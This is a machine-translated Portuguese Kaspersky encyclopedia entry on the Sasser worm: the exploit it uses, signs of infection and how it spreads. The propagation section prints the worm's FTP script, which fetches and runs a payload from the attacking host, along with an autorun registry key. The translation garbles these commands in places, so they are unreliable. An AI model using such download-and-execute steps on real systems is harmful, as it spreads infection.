ESTE SERVIÇO PODE CONTER TRADUÇÕES FEITAS PELO GOOGLE. O GOOGLE SE ISENTA DE TODAS AS GARANTIAS RELACIONADAS ÀS TRADUÇÕES, EXPRESSAS OU IMPLÍCITAS, INCLUINDO QUALQUER RESPONSABILIDADE EM RELAÇÃO À PRECISÃO, CONFIABILIDADE E QUALQUER DEVER IMPLÍCITO SOBRE SUA COMERCIALIZAÇÃO, ADEQUAÇÃO PARA UM FIM ESPECÍFICO E NÃO-VIOLAÇÃO.

Para sua conveniência, o site da Kaspersky Lab foi traduzido com a utilização do software de tradução Google Tradutor. Foram realizados esforços razoáveis para o oferecimento de uma tradução precisa; entretanto, as traduções automatizadas não são perfeitas e tampouco pretendem substituir a tradução qualificada de especialistas. Essas traduções são fornecidas como um serviço para os usuários do site da Kaspersky Lab e são exibidas "como estão". Não há nenhuma garantia de qualquer tipo, seja expressa ou implícita, sobre a precisão, confiabilidade, ou exatidão de quaisquer traduções feitas do inglês para qualquer outro idioma. Alguns conteúdos (como imagens, vídeos, Flash, etc.) podem não estar corretamente traduzidos devido às limitações do programa de tradução.

Net-Worm.Win32.Sasser

Data de detecção 05/13/2004
Classe Net-Worm
Plataforma Win32
Descrição

O Sasser é um worm da Internet que explora a vulnerabilidade do MS Windows LSASS descrita no Boletim de Segurança da Microsoft MS04-011 .

A Microsoft lançou um patch para esta vulnerabilidade em 13 de abril de 2004, enquanto o Sasser.a foi detectado pela primeira vez em 30 de abril de 2004.

Sasser opera de maneira muito semelhante a Lovesan, exceto que Lovesan explorou uma vulnerabilidade no serviço PRC DCOM, não no serviço LSASS.

O Sasser afeta computadores que executam o Windows 2000, o Windows XP, o Windows Server 2003. O Sasser funciona em todas as outras versões do Windows, mas não consegue infectá-los, atacando através da vulnerabilidade.

Sasser é escrito em C / C ++, usando o complemento Visual C. O worm tem cerca de 15 KL e é embalado pelo PECompact2.

Sinais de Infecção

  • o arquivo 'avserve.exe' no diretório do Windows.
  • Uma mensagem de erro sobre a falha do serviço LSASS, que geralmente também faz com que o sistema seja reinicializado.

Propagação

Após o lançamento, o Sasser se copia para o diretório raiz do Windows sob o nome avserve.exe e registra esse arquivo na chave de execução automática do registro do sistema:

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "% WINDIR% avserve.exe" 

Sasser cria um identificador único 'Jobaka31' na RAM para localizar cópias de si mesmo em caso de futuras tentativas de infecção.

O Sasser lança o servidor FTP na porta TCP 5554 e, em seguida, inicia 128 rotinas de propagação. Durante esse processo, o worm tenta iniciar o processo AbortSystemShutdown para proibir a reinicialização do sistema.

O Sasser inicia uma varredura de endereços IP para identificar endereços de vítimas e envia uma solicitação para a porta TCP 445. Se alguma máquina responder, o Sasser explora a vulnerabilidade LSASS para iniciar um shell de comando 'cmd.exe' na porta TCP 9996. Finalmente Sasser, comanda a máquina infectada para baixar e iniciar o principal componente worm sob o nome "N_up.exe", onde "N" é um número aleatório:

 ecoar



echo open [endereço da máquina atacante] 5554 >> cmd.ftp



echo anônimo >> cmd.ftp



usuário de eco



echo bin >> cmd.ftp



echo get [número aleatório] _up.exe >> cmd.ftp



eco bye >> cmd.ftp



ecoar



ftp -s: cmd.ftp



[número aleatório] _up.exe



ecoar



del cmd.ftp



ecoar 

Como resultado, uma máquina pode ser atacada mais de uma vez e conter várias cópias do worm com nomes de amostra, como:

 23101_up.exe



5409_up.exe 

e assim por diante.

De outros

Após a infecção, a máquina vítima gera uma mensagem de erro sobre a falha de um serviço LSASS, após o que pode tentar reinicializar.

Sasser cria o arquivo 'win.log' no diretório raiz da unidade C, onde o worm registra os endereços IP de todas as máquinas atacadas.


Link para o original